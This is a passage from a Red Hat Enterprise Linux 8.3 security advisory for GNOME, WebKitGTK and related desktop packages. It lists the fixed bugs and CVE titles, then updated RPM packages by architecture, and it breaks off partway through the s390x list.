webkit2gtk3 (2.28.4), xdg-desktop-portal (1.6.0), xdg-desktop-portal-gtk
(1.6.0).
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.3 Release Notes linked from the References section. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
GDM must be restarted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):
1207179 - Select items matching non existing pattern does not unselect already selected
1566027 - can't correctly compute contents size if hidden files are included
1569868 - Browsing samba shares using gvfs is very slow
1652178 - [RFE] perf-tool run on wayland
1656262 - The terminal's character display is unclear on rhel8 guest after installing gnome
1668895 - [RHEL8] Timedlogin Fails when Userlist is Disabled
1692536 - login screen shows after gnome-initial-setup
1706008 - Sound Effect sometimes fails to change to selected option.
1706076 - Automatic suspend for 90 minutes is set for 80 minutes instead.
1715845 - JS ERROR: TypeError: this._workspacesViews[i] is undefined
1719937 - GNOME Extension: Auto-Move-Windows Not Working Properly
1758891 - tracker-devel subpackage missing from el8 repos
1775345 - Rebase xdg-desktop-portal to 1.6
1778579 - Nautilus does not respect umask settings.
1779691 - Rebase xdg-desktop-portal-gtk to 1.6
1794045 - There are two different high contrast versions of desktop icons
1804719 - Update vte291 to 0.52.4
1805929 - RHEL 8.1 gnome-shell-extension errors
1811721 - CVE-2020-10018 webkitgtk: Use-after-free issue in accessibility/AXObjectCache.cpp
1814820 - No checkbox to install updates in the shutdown dialog
1816070 - "search for an application to open this file" dialog broken
1816678 - CVE-2019-8846 webkitgtk: Use after free issue may lead to remote code execution
1816684 - CVE-2019-8835 webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution
1816686 - CVE-2019-8844 webkitgtk: Processing maliciously crafted web content may lead to arbitrary code execution
1817143 - Rebase WebKitGTK to 2.28
1820759 - Include IO stall fixes
1820760 - Include IO fixes
1824362 - [BZ] Setting in gnome-tweak-tool Window List will reset upon opening
1827030 - gnome-settings-daemon: subscription notification on CentOS Stream
1829369 - CVE-2020-11793 webkitgtk: use-after-free via crafted web content
1832347 - [Rebase] Rebase pipewire to 0.3.x
1833158 - gdm-related dconf folders and keyfiles are not found in fresh 8.2 install
1837381 - Backport screen cast improvements to 8.3
1837406 - Rebase gnome-remote-desktop to PipeWire 0.3 version
1837413 - Backport changes needed by xdg-desktop-portal-gtk-1.6
1837648 - Vendor.conf should point to https://access.redhat.com/site/solutions/537113
1840080 - Can not control top bar menus via keys in Wayland
1840788 - [flatpak][rhel8] unable to build potrace as dependency
1843486 - Software crash after clicking Updates tab
1844578 - anaconda very rarely crashes at startup with a pygobject traceback
1846191 - usb adapters hotplug crashes gnome-shell
1847051 - JS ERROR: TypeError: area is null
1847061 - File search doesn't work under certain locales
1847062 - gnome-remote-desktop crash on QXL graphics
1847203 - gnome-shell: get_top_visible_window_actor(): gnome-shell killed by SIGSEGV
1853477 - CVE-2020-15503 LibRaw: lack of thumbnail size range check can lead to buffer overflow
1854734 - PipeWire 0.2 should be required by xdg-desktop-portal
1866332 - Remove obsolete libusb-devel dependency
1868260 - [Hyper-V][RHEL8] VM starts GUI failed on Hyper-V 2019/2016, hangs at "Started GNOME Display Manager" - GDM regression issue.
1872270 - WebKit renderer hangs on Cockpit
1873093 - CVE-2020-14391 gnome-settings-daemon: Red Hat Customer Portal password logged and passed as command line argument when user registers through GNOME control center
1873963 - Failed to start session: org.gnome.Mutter.ScreenCast API version 2 lower than minimum supported version 3
1876462 - CVE-2020-3885 webkitgtk: Incorrect processing of file URLs
1876463 - CVE-2020-3894 webkitgtk: Race condition allows reading of restricted memory
1876465 - CVE-2020-3895 webkitgtk: Memory corruption triggered by a malicious web content
1876468 - CVE-2020-3897 webkitgtk: Type confusion leading to arbitrary code execution
1876470 - CVE-2020-3899 webkitgtk: Memory consumption issue leading to arbitrary code execution
1876472 - CVE-2020-3900 webkitgtk: Memory corruption triggered by a malicious web content
1876473 - CVE-2020-3901 webkitgtk: Type confusion leading to arbitrary code execution
1876476 - CVE-2020-3902 webkitgtk: Input validation issue leading to cross-site script attack
1876516 - CVE-2020-3862 webkitgtk: Denial of service via incorrect memory handling
1876518 - CVE-2020-3864 webkitgtk: Non-unique security origin for DOM object contexts
1876521 - CVE-2020-3865 webkitgtk: Incorrect security check for a top-level DOM object context
1876522 - CVE-2020-3867 webkitgtk: Incorrect state management leading to universal cross-site scripting
1876523 - CVE-2020-3868 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876536 - CVE-2019-8710 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876537 - CVE-2019-8743 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876540 - CVE-2019-8764 webkitgtk: Incorrect state management leading to universal cross-site scripting
1876543 - CVE-2019-8766 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876545 - CVE-2019-8782 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876548 - CVE-2019-8783 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876549 - CVE-2019-8808 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876550 - CVE-2019-8811 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876552 - CVE-2019-8812 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876553 - CVE-2019-8813 webkitgtk: Incorrect state management leading to universal cross-site scripting
1876554 - CVE-2019-8814 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876555 - CVE-2019-8815 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876556 - CVE-2019-8816 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876590 - CVE-2019-8819 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876591 - CVE-2019-8820 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876594 - CVE-2019-8823 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876607 - CVE-2019-8625 webkitgtk: Incorrect state management leading to universal cross-site scripting
1876611 - CVE-2019-8720 webkitgtk: Multiple memory corruption issues leading to arbitrary code execution
1876617 - CVE-2019-8769 webkitgtk: Websites could reveal browsing history
1876619 - CVE-2019-8771 webkitgtk: Violation of iframe sandboxing policy
1877853 - File descriptors are being left behind on logout of RHEL 8 session
1879532 - CVE-2020-9862 webkitgtk: Command injection in web inspector
1879535 - CVE-2020-9893 webkitgtk: Use-after-free may lead to application termination or arbitrary code execution
1879536 - CVE-2020-9894 webkitgtk: Out-of-bounds read may lead to unexpected application termination or arbitrary code execution
1879538 - CVE-2020-9895 webkitgtk: Use-after-free may lead to application termination or arbitrary code execution
1879540 - CVE-2020-9915 webkitgtk: Access issue in content security policy
1879541 - CVE-2020-9925 webkitgtk: A logic issue may lead to cross site scripting
1879545 - CVE-2020-9802 webkitgtk: Logic issue may lead to arbitrary code execution
1879557 - CVE-2020-9803 webkitgtk: Memory corruption may lead to arbitrary code execution
1879559 - CVE-2020-9805 webkitgtk: Logic issue may lead to cross site scripting
1879563 - CVE-2020-9806 webkitgtk: Memory corruption may lead to arbitrary code execution
1879564 - CVE-2020-9807 webkitgtk: Memory corruption may lead to arbitrary code execution
1879566 - CVE-2020-9843 webkitgtk: Input validation issue may lead to cross site scripting
1879568 - CVE-2020-9850 webkitgtk: Logic issue may lead to arbitrary code execution
1880339 - Right GLX stereo texture is potentially leaked for each closed window
6. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source:
LibRaw-0.19.5-2.el8.src.rpm
PackageKit-1.1.12-6.el8.src.rpm
dleyna-renderer-0.6.0-3.el8.src.rpm
frei0r-plugins-1.6.1-7.el8.src.rpm
gdm-3.28.3-34.el8.src.rpm
gnome-control-center-3.28.2-22.el8.src.rpm
gnome-photos-3.28.1-3.el8.src.rpm
gnome-remote-desktop-0.1.8-3.el8.src.rpm
gnome-session-3.28.1-10.el8.src.rpm
gnome-settings-daemon-3.32.0-11.el8.src.rpm
gnome-shell-3.32.2-20.el8.src.rpm
gnome-shell-extensions-3.32.1-11.el8.src.rpm
gnome-terminal-3.28.3-2.el8.src.rpm
gtk3-3.22.30-6.el8.src.rpm
gvfs-1.36.2-10.el8.src.rpm
mutter-3.32.2-48.el8.src.rpm
nautilus-3.28.1-14.el8.src.rpm
pipewire-0.3.6-1.el8.src.rpm
pipewire0.2-0.2.7-6.el8.src.rpm
potrace-1.15-3.el8.src.rpm
tracker-2.1.5-2.el8.src.rpm
vte291-0.52.4-2.el8.src.rpm
webkit2gtk3-2.28.4-1.el8.src.rpm
webrtc-audio-processing-0.3-9.el8.src.rpm
xdg-desktop-portal-1.6.0-2.el8.src.rpm
xdg-desktop-portal-gtk-1.6.0-1.el8.src.rpm
aarch64:
PackageKit-1.1.12-6.el8.aarch64.rpm
PackageKit-command-not-found-1.1.12-6.el8.aarch64.rpm
PackageKit-command-not-found-debuginfo-1.1.12-6.el8.aarch64.rpm
PackageKit-cron-1.1.12-6.el8.aarch64.rpm
PackageKit-debuginfo-1.1.12-6.el8.aarch64.rpm
PackageKit-debugsource-1.1.12-6.el8.aarch64.rpm
PackageKit-glib-1.1.12-6.el8.aarch64.rpm
PackageKit-glib-debuginfo-1.1.12-6.el8.aarch64.rpm
PackageKit-gstreamer-plugin-1.1.12-6.el8.aarch64.rpm
PackageKit-gstreamer-plugin-debuginfo-1.1.12-6.el8.aarch64.rpm
PackageKit-gtk3-module-1.1.12-6.el8.aarch64.rpm
PackageKit-gtk3-module-debuginfo-1.1.12-6.el8.aarch64.rpm
frei0r-plugins-1.6.1-7.el8.aarch64.rpm
frei0r-plugins-debuginfo-1.6.1-7.el8.aarch64.rpm
frei0r-plugins-debugsource-1.6.1-7.el8.aarch64.rpm
frei0r-plugins-opencv-1.6.1-7.el8.aarch64.rpm
frei0r-plugins-opencv-debuginfo-1.6.1-7.el8.aarch64.rpm
gdm-3.28.3-34.el8.aarch64.rpm
gdm-debuginfo-3.28.3-34.el8.aarch64.rpm
gdm-debugsource-3.28.3-34.el8.aarch64.rpm
gnome-control-center-3.28.2-22.el8.aarch64.rpm
gnome-control-center-debuginfo-3.28.2-22.el8.aarch64.rpm
gnome-control-center-debugsource-3.28.2-22.el8.aarch64.rpm
gnome-remote-desktop-0.1.8-3.el8.aarch64.rpm
gnome-remote-desktop-debuginfo-0.1.8-3.el8.aarch64.rpm
gnome-remote-desktop-debugsource-0.1.8-3.el8.aarch64.rpm
gnome-session-3.28.1-10.el8.aarch64.rpm
gnome-session-debuginfo-3.28.1-10.el8.aarch64.rpm
gnome-session-debugsource-3.28.1-10.el8.aarch64.rpm
gnome-session-wayland-session-3.28.1-10.el8.aarch64.rpm
gnome-session-xsession-3.28.1-10.el8.aarch64.rpm
gnome-settings-daemon-3.32.0-11.el8.aarch64.rpm
gnome-settings-daemon-debuginfo-3.32.0-11.el8.aarch64.rpm
gnome-settings-daemon-debugsource-3.32.0-11.el8.aarch64.rpm
gnome-shell-3.32.2-20.el8.aarch64.rpm
gnome-shell-debuginfo-3.32.2-20.el8.aarch64.rpm
gnome-shell-debugsource-3.32.2-20.el8.aarch64.rpm
gnome-terminal-3.28.3-2.el8.aarch64.rpm
gnome-terminal-debuginfo-3.28.3-2.el8.aarch64.rpm
gnome-terminal-debugsource-3.28.3-2.el8.aarch64.rpm
gnome-terminal-nautilus-3.28.3-2.el8.aarch64.rpm
gnome-terminal-nautilus-debuginfo-3.28.3-2.el8.aarch64.rpm
gsettings-desktop-schemas-devel-3.32.0-5.el8.aarch64.rpm
gtk-update-icon-cache-3.22.30-6.el8.aarch64.rpm
gtk-update-icon-cache-debuginfo-3.22.30-6.el8.aarch64.rpm
gtk3-3.22.30-6.el8.aarch64.rpm
gtk3-debuginfo-3.22.30-6.el8.aarch64.rpm
gtk3-debugsource-3.22.30-6.el8.aarch64.rpm
gtk3-devel-3.22.30-6.el8.aarch64.rpm
gtk3-devel-debuginfo-3.22.30-6.el8.aarch64.rpm
gtk3-immodule-xim-3.22.30-6.el8.aarch64.rpm
gtk3-immodule-xim-debuginfo-3.22.30-6.el8.aarch64.rpm
gtk3-immodules-debuginfo-3.22.30-6.el8.aarch64.rpm
gtk3-tests-debuginfo-3.22.30-6.el8.aarch64.rpm
gvfs-1.36.2-10.el8.aarch64.rpm
gvfs-afc-1.36.2-10.el8.aarch64.rpm
gvfs-afc-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-afp-1.36.2-10.el8.aarch64.rpm
gvfs-afp-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-archive-1.36.2-10.el8.aarch64.rpm
gvfs-archive-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-client-1.36.2-10.el8.aarch64.rpm
gvfs-client-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-debugsource-1.36.2-10.el8.aarch64.rpm
gvfs-devel-1.36.2-10.el8.aarch64.rpm
gvfs-fuse-1.36.2-10.el8.aarch64.rpm
gvfs-fuse-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-goa-1.36.2-10.el8.aarch64.rpm
gvfs-goa-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-gphoto2-1.36.2-10.el8.aarch64.rpm
gvfs-gphoto2-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-mtp-1.36.2-10.el8.aarch64.rpm
gvfs-mtp-debuginfo-1.36.2-10.el8.aarch64.rpm
gvfs-smb-1.36.2-10.el8.aarch64.rpm
gvfs-smb-debuginfo-1.36.2-10.el8.aarch64.rpm
libsoup-debuginfo-2.62.3-2.el8.aarch64.rpm
libsoup-debugsource-2.62.3-2.el8.aarch64.rpm
libsoup-devel-2.62.3-2.el8.aarch64.rpm
mutter-3.32.2-48.el8.aarch64.rpm
mutter-debuginfo-3.32.2-48.el8.aarch64.rpm
mutter-debugsource-3.32.2-48.el8.aarch64.rpm
mutter-tests-debuginfo-3.32.2-48.el8.aarch64.rpm
nautilus-3.28.1-14.el8.aarch64.rpm
nautilus-debuginfo-3.28.1-14.el8.aarch64.rpm
nautilus-debugsource-3.28.1-14.el8.aarch64.rpm
nautilus-extensions-3.28.1-14.el8.aarch64.rpm
nautilus-extensions-debuginfo-3.28.1-14.el8.aarch64.rpm
pipewire-0.3.6-1.el8.aarch64.rpm
pipewire-alsa-debuginfo-0.3.6-1.el8.aarch64.rpm
pipewire-debuginfo-0.3.6-1.el8.aarch64.rpm
pipewire-debugsource-0.3.6-1.el8.aarch64.rpm
pipewire-devel-0.3.6-1.el8.aarch64.rpm
pipewire-doc-0.3.6-1.el8.aarch64.rpm
pipewire-gstreamer-debuginfo-0.3.6-1.el8.aarch64.rpm
pipewire-libs-0.3.6-1.el8.aarch64.rpm
pipewire-libs-debuginfo-0.3.6-1.el8.aarch64.rpm
pipewire-utils-0.3.6-1.el8.aarch64.rpm
pipewire-utils-debuginfo-0.3.6-1.el8.aarch64.rpm
pipewire0.2-debugsource-0.2.7-6.el8.aarch64.rpm
pipewire0.2-devel-0.2.7-6.el8.aarch64.rpm
pipewire0.2-libs-0.2.7-6.el8.aarch64.rpm
pipewire0.2-libs-debuginfo-0.2.7-6.el8.aarch64.rpm
potrace-1.15-3.el8.aarch64.rpm
potrace-debuginfo-1.15-3.el8.aarch64.rpm
potrace-debugsource-1.15-3.el8.aarch64.rpm
pygobject3-debuginfo-3.28.3-2.el8.aarch64.rpm
pygobject3-debugsource-3.28.3-2.el8.aarch64.rpm
python3-gobject-3.28.3-2.el8.aarch64.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.aarch64.rpm
python3-gobject-debuginfo-3.28.3-2.el8.aarch64.rpm
tracker-2.1.5-2.el8.aarch64.rpm
tracker-debuginfo-2.1.5-2.el8.aarch64.rpm
tracker-debugsource-2.1.5-2.el8.aarch64.rpm
vte-profile-0.52.4-2.el8.aarch64.rpm
vte291-0.52.4-2.el8.aarch64.rpm
vte291-debuginfo-0.52.4-2.el8.aarch64.rpm
vte291-debugsource-0.52.4-2.el8.aarch64.rpm
vte291-devel-debuginfo-0.52.4-2.el8.aarch64.rpm
webkit2gtk3-2.28.4-1.el8.aarch64.rpm
webkit2gtk3-debuginfo-2.28.4-1.el8.aarch64.rpm
webkit2gtk3-debugsource-2.28.4-1.el8.aarch64.rpm
webkit2gtk3-devel-2.28.4-1.el8.aarch64.rpm
webkit2gtk3-devel-debuginfo-2.28.4-1.el8.aarch64.rpm
webkit2gtk3-jsc-2.28.4-1.el8.aarch64.rpm
webkit2gtk3-jsc-debuginfo-2.28.4-1.el8.aarch64.rpm
webkit2gtk3-jsc-devel-2.28.4-1.el8.aarch64.rpm
webkit2gtk3-jsc-devel-debuginfo-2.28.4-1.el8.aarch64.rpm
webrtc-audio-processing-0.3-9.el8.aarch64.rpm
webrtc-audio-processing-debuginfo-0.3-9.el8.aarch64.rpm
webrtc-audio-processing-debugsource-0.3-9.el8.aarch64.rpm
xdg-desktop-portal-1.6.0-2.el8.aarch64.rpm
xdg-desktop-portal-debuginfo-1.6.0-2.el8.aarch64.rpm
xdg-desktop-portal-debugsource-1.6.0-2.el8.aarch64.rpm
xdg-desktop-portal-gtk-1.6.0-1.el8.aarch64.rpm
xdg-desktop-portal-gtk-debuginfo-1.6.0-1.el8.aarch64.rpm
xdg-desktop-portal-gtk-debugsource-1.6.0-1.el8.aarch64.rpm
noarch:
gnome-classic-session-3.32.1-11.el8.noarch.rpm
gnome-control-center-filesystem-3.28.2-22.el8.noarch.rpm
gnome-shell-extension-apps-menu-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-auto-move-windows-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-common-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-dash-to-dock-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-desktop-icons-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-disable-screenshield-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-drive-menu-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-horizontal-workspaces-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-launch-new-instance-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-native-window-placement-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-no-hot-corner-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-panel-favorites-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-places-menu-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-screenshot-window-sizer-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-systemMonitor-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-top-icons-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-updates-dialog-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-user-theme-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-window-grouper-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-window-list-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-windowsNavigator-3.32.1-11.el8.noarch.rpm
gnome-shell-extension-workspace-indicator-3.32.1-11.el8.noarch.rpm
ppc64le:
LibRaw-0.19.5-2.el8.ppc64le.rpm
LibRaw-debuginfo-0.19.5-2.el8.ppc64le.rpm
LibRaw-debugsource-0.19.5-2.el8.ppc64le.rpm
LibRaw-samples-debuginfo-0.19.5-2.el8.ppc64le.rpm
PackageKit-1.1.12-6.el8.ppc64le.rpm
PackageKit-command-not-found-1.1.12-6.el8.ppc64le.rpm
PackageKit-command-not-found-debuginfo-1.1.12-6.el8.ppc64le.rpm
PackageKit-cron-1.1.12-6.el8.ppc64le.rpm
PackageKit-debuginfo-1.1.12-6.el8.ppc64le.rpm
PackageKit-debugsource-1.1.12-6.el8.ppc64le.rpm
PackageKit-glib-1.1.12-6.el8.ppc64le.rpm
PackageKit-glib-debuginfo-1.1.12-6.el8.ppc64le.rpm
PackageKit-gstreamer-plugin-1.1.12-6.el8.ppc64le.rpm
PackageKit-gstreamer-plugin-debuginfo-1.1.12-6.el8.ppc64le.rpm
PackageKit-gtk3-module-1.1.12-6.el8.ppc64le.rpm
PackageKit-gtk3-module-debuginfo-1.1.12-6.el8.ppc64le.rpm
dleyna-renderer-0.6.0-3.el8.ppc64le.rpm
dleyna-renderer-debuginfo-0.6.0-3.el8.ppc64le.rpm
dleyna-renderer-debugsource-0.6.0-3.el8.ppc64le.rpm
frei0r-plugins-1.6.1-7.el8.ppc64le.rpm
frei0r-plugins-debuginfo-1.6.1-7.el8.ppc64le.rpm
frei0r-plugins-debugsource-1.6.1-7.el8.ppc64le.rpm
frei0r-plugins-opencv-1.6.1-7.el8.ppc64le.rpm
frei0r-plugins-opencv-debuginfo-1.6.1-7.el8.ppc64le.rpm
gdm-3.28.3-34.el8.ppc64le.rpm
gdm-debuginfo-3.28.3-34.el8.ppc64le.rpm
gdm-debugsource-3.28.3-34.el8.ppc64le.rpm
gnome-control-center-3.28.2-22.el8.ppc64le.rpm
gnome-control-center-debuginfo-3.28.2-22.el8.ppc64le.rpm
gnome-control-center-debugsource-3.28.2-22.el8.ppc64le.rpm
gnome-photos-3.28.1-3.el8.ppc64le.rpm
gnome-photos-debuginfo-3.28.1-3.el8.ppc64le.rpm
gnome-photos-debugsource-3.28.1-3.el8.ppc64le.rpm
gnome-photos-tests-3.28.1-3.el8.ppc64le.rpm
gnome-remote-desktop-0.1.8-3.el8.ppc64le.rpm
gnome-remote-desktop-debuginfo-0.1.8-3.el8.ppc64le.rpm
gnome-remote-desktop-debugsource-0.1.8-3.el8.ppc64le.rpm
gnome-session-3.28.1-10.el8.ppc64le.rpm
gnome-session-debuginfo-3.28.1-10.el8.ppc64le.rpm
gnome-session-debugsource-3.28.1-10.el8.ppc64le.rpm
gnome-session-wayland-session-3.28.1-10.el8.ppc64le.rpm
gnome-session-xsession-3.28.1-10.el8.ppc64le.rpm
gnome-settings-daemon-3.32.0-11.el8.ppc64le.rpm
gnome-settings-daemon-debuginfo-3.32.0-11.el8.ppc64le.rpm
gnome-settings-daemon-debugsource-3.32.0-11.el8.ppc64le.rpm
gnome-shell-3.32.2-20.el8.ppc64le.rpm
gnome-shell-debuginfo-3.32.2-20.el8.ppc64le.rpm
gnome-shell-debugsource-3.32.2-20.el8.ppc64le.rpm
gnome-terminal-3.28.3-2.el8.ppc64le.rpm
gnome-terminal-debuginfo-3.28.3-2.el8.ppc64le.rpm
gnome-terminal-debugsource-3.28.3-2.el8.ppc64le.rpm
gnome-terminal-nautilus-3.28.3-2.el8.ppc64le.rpm
gnome-terminal-nautilus-debuginfo-3.28.3-2.el8.ppc64le.rpm
gsettings-desktop-schemas-devel-3.32.0-5.el8.ppc64le.rpm
gtk-update-icon-cache-3.22.30-6.el8.ppc64le.rpm
gtk-update-icon-cache-debuginfo-3.22.30-6.el8.ppc64le.rpm
gtk3-3.22.30-6.el8.ppc64le.rpm
gtk3-debuginfo-3.22.30-6.el8.ppc64le.rpm
gtk3-debugsource-3.22.30-6.el8.ppc64le.rpm
gtk3-devel-3.22.30-6.el8.ppc64le.rpm
gtk3-devel-debuginfo-3.22.30-6.el8.ppc64le.rpm
gtk3-immodule-xim-3.22.30-6.el8.ppc64le.rpm
gtk3-immodule-xim-debuginfo-3.22.30-6.el8.ppc64le.rpm
gtk3-immodules-debuginfo-3.22.30-6.el8.ppc64le.rpm
gtk3-tests-debuginfo-3.22.30-6.el8.ppc64le.rpm
gvfs-1.36.2-10.el8.ppc64le.rpm
gvfs-afc-1.36.2-10.el8.ppc64le.rpm
gvfs-afc-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-afp-1.36.2-10.el8.ppc64le.rpm
gvfs-afp-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-archive-1.36.2-10.el8.ppc64le.rpm
gvfs-archive-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-client-1.36.2-10.el8.ppc64le.rpm
gvfs-client-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-debugsource-1.36.2-10.el8.ppc64le.rpm
gvfs-devel-1.36.2-10.el8.ppc64le.rpm
gvfs-fuse-1.36.2-10.el8.ppc64le.rpm
gvfs-fuse-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-goa-1.36.2-10.el8.ppc64le.rpm
gvfs-goa-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-gphoto2-1.36.2-10.el8.ppc64le.rpm
gvfs-gphoto2-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-mtp-1.36.2-10.el8.ppc64le.rpm
gvfs-mtp-debuginfo-1.36.2-10.el8.ppc64le.rpm
gvfs-smb-1.36.2-10.el8.ppc64le.rpm
gvfs-smb-debuginfo-1.36.2-10.el8.ppc64le.rpm
libsoup-debuginfo-2.62.3-2.el8.ppc64le.rpm
libsoup-debugsource-2.62.3-2.el8.ppc64le.rpm
libsoup-devel-2.62.3-2.el8.ppc64le.rpm
mutter-3.32.2-48.el8.ppc64le.rpm
mutter-debuginfo-3.32.2-48.el8.ppc64le.rpm
mutter-debugsource-3.32.2-48.el8.ppc64le.rpm
mutter-tests-debuginfo-3.32.2-48.el8.ppc64le.rpm
nautilus-3.28.1-14.el8.ppc64le.rpm
nautilus-debuginfo-3.28.1-14.el8.ppc64le.rpm
nautilus-debugsource-3.28.1-14.el8.ppc64le.rpm
nautilus-extensions-3.28.1-14.el8.ppc64le.rpm
nautilus-extensions-debuginfo-3.28.1-14.el8.ppc64le.rpm
pipewire-0.3.6-1.el8.ppc64le.rpm
pipewire-alsa-debuginfo-0.3.6-1.el8.ppc64le.rpm
pipewire-debuginfo-0.3.6-1.el8.ppc64le.rpm
pipewire-debugsource-0.3.6-1.el8.ppc64le.rpm
pipewire-devel-0.3.6-1.el8.ppc64le.rpm
pipewire-doc-0.3.6-1.el8.ppc64le.rpm
pipewire-gstreamer-debuginfo-0.3.6-1.el8.ppc64le.rpm
pipewire-libs-0.3.6-1.el8.ppc64le.rpm
pipewire-libs-debuginfo-0.3.6-1.el8.ppc64le.rpm
pipewire-utils-0.3.6-1.el8.ppc64le.rpm
pipewire-utils-debuginfo-0.3.6-1.el8.ppc64le.rpm
pipewire0.2-debugsource-0.2.7-6.el8.ppc64le.rpm
pipewire0.2-devel-0.2.7-6.el8.ppc64le.rpm
pipewire0.2-libs-0.2.7-6.el8.ppc64le.rpm
pipewire0.2-libs-debuginfo-0.2.7-6.el8.ppc64le.rpm
potrace-1.15-3.el8.ppc64le.rpm
potrace-debuginfo-1.15-3.el8.ppc64le.rpm
potrace-debugsource-1.15-3.el8.ppc64le.rpm
pygobject3-debuginfo-3.28.3-2.el8.ppc64le.rpm
pygobject3-debugsource-3.28.3-2.el8.ppc64le.rpm
python3-gobject-3.28.3-2.el8.ppc64le.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.ppc64le.rpm
python3-gobject-debuginfo-3.28.3-2.el8.ppc64le.rpm
tracker-2.1.5-2.el8.ppc64le.rpm
tracker-debuginfo-2.1.5-2.el8.ppc64le.rpm
tracker-debugsource-2.1.5-2.el8.ppc64le.rpm
vte-profile-0.52.4-2.el8.ppc64le.rpm
vte291-0.52.4-2.el8.ppc64le.rpm
vte291-debuginfo-0.52.4-2.el8.ppc64le.rpm
vte291-debugsource-0.52.4-2.el8.ppc64le.rpm
vte291-devel-debuginfo-0.52.4-2.el8.ppc64le.rpm
webkit2gtk3-2.28.4-1.el8.ppc64le.rpm
webkit2gtk3-debuginfo-2.28.4-1.el8.ppc64le.rpm
webkit2gtk3-debugsource-2.28.4-1.el8.ppc64le.rpm
webkit2gtk3-devel-2.28.4-1.el8.ppc64le.rpm
webkit2gtk3-devel-debuginfo-2.28.4-1.el8.ppc64le.rpm
webkit2gtk3-jsc-2.28.4-1.el8.ppc64le.rpm
webkit2gtk3-jsc-debuginfo-2.28.4-1.el8.ppc64le.rpm
webkit2gtk3-jsc-devel-2.28.4-1.el8.ppc64le.rpm
webkit2gtk3-jsc-devel-debuginfo-2.28.4-1.el8.ppc64le.rpm
webrtc-audio-processing-0.3-9.el8.ppc64le.rpm
webrtc-audio-processing-debuginfo-0.3-9.el8.ppc64le.rpm
webrtc-audio-processing-debugsource-0.3-9.el8.ppc64le.rpm
xdg-desktop-portal-1.6.0-2.el8.ppc64le.rpm
xdg-desktop-portal-debuginfo-1.6.0-2.el8.ppc64le.rpm
xdg-desktop-portal-debugsource-1.6.0-2.el8.ppc64le.rpm
xdg-desktop-portal-gtk-1.6.0-1.el8.ppc64le.rpm
xdg-desktop-portal-gtk-debuginfo-1.6.0-1.el8.ppc64le.rpm
xdg-desktop-portal-gtk-debugsource-1.6.0-1.el8.ppc64le.rpm
s390x:
PackageKit-1.1.12-6.el8.s390x.rpm
PackageKit-command-not-found-1.1.12-6.el8.s390x.rpm
PackageKit-command-not-found-debuginfo-1.1.12-6.el8.s390x.rpm
PackageKit-cron-1.1.12-6.el8.s390x.rpm
PackageKit-debuginfo-1.1.12-6.el8.s390x.rpm
PackageKit-debugsource-1.1.12-6.el8.s390x.rpm
PackageKit-glib-1.1.12-6.el8.s390x.rpm
PackageKit-glib-debuginfo-1.1.12-6.el8.s390x.rpm
PackageKit-gstreamer-plugin-1.1.12-6.el8.s390x.rpm
PackageKit-gstreamer-plugin-debuginfo-1.1.12-6.el8.s390x.rpm
PackageKit-gtk3-module-1.1.12-6.el8.s390x.rpm
PackageKit-gtk3-module-debuginfo-1.1.12-6.el8.s390x.rpm
frei0r-plugins-1.6.1-7.el8.s390x.rpm
frei0r-plugins-debuginfo-1.6.1-7.el8.s390x.rpm
frei0r-plugins-debugsource-1.6.1-7.el8.s390x.rpm
frei0r-plugins-opencv-1.6.1-7.el8.s390x.rpm
